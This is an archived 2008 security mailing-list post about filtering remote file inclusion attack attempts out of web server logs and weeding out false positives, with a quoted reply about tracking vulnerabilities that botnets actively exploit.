[VIM] RFI BotNet and phpBB 0-day?

Noam Rathaus noamr at beyondsecurity.com
Thu Mar 20 18:31:23 UTC 2008 

Hi,

I wrote a while ago a perl script that goes through the apache logs and 
captures anything that looks like an RFI attack.

Problem is as you guys mentioned that:
1) Some RFI aren't RFI, they are people that mistype URLs, or double-paste 
URLs, etc
2) Some RFI attacks are not viable - rather people testing things out ... like 
you probably try SQL inject any site that has a nice number in the URL :)
3) Some RFI attacks are so automated that they will try to attack you even if 
you don't have anything installed on your computer

If anyone wants this script I can send it over and he can look at the effort I 
did.

(BTW: The perl also sorts and returns unique RFI attacks - in order to 
minimize the 100k+ RFI our site sees every month)

On Thursday 20 March 2008 20:12:32 security curmudgeon wrote:
> : If your bored I have a few rfi's for you to go through :)
> :
> : # wc -l
> : todays-rfi-bots.txt
> :
> :    44737 todays-rfi-bots.txt
> :
> : The file will show the number of uniq entries that have hit milw0rm in
> : the past 24 hours requesting http inclusions.  People forget to remove
> : milw0rm from their rfi scans.
>
> Hah, this is what I was thinking of doing but automating it more to pull
> them out nightly. If time permitted, I was going to get fancy and have it
> weed out known vulnerabilities. If not, I wonder if there are a few folks
> that could check them if we mail them here with a little research already
> done.
>
> Obviously we all want to track vulnerabilities in our respective
> databases, but these are of specific interest for several reasons.
> Primarily, they are being actively exploited in the wild and would qualify
> for 'undercover vulnerabilities' [1].
>
> I'm also curious if these suffer from the 'grep and gripe' false positives
> that we see on the mail lists, and if the botnet is essentially trying to
> do inclusions on scripts that aren't really vulnerable in the first place.
>
> .b
>
> [1] http://osvdb.org/blog/?p=227



-- 
Noam Rathaus
CTO
noamr at beyondsecurity.com
http://www.beyondsecurity.com

"Know that you are safe."

Beyond Security Finalist for the "Red Herring 100 Global" Awards 2007

More information about the VIM mailing list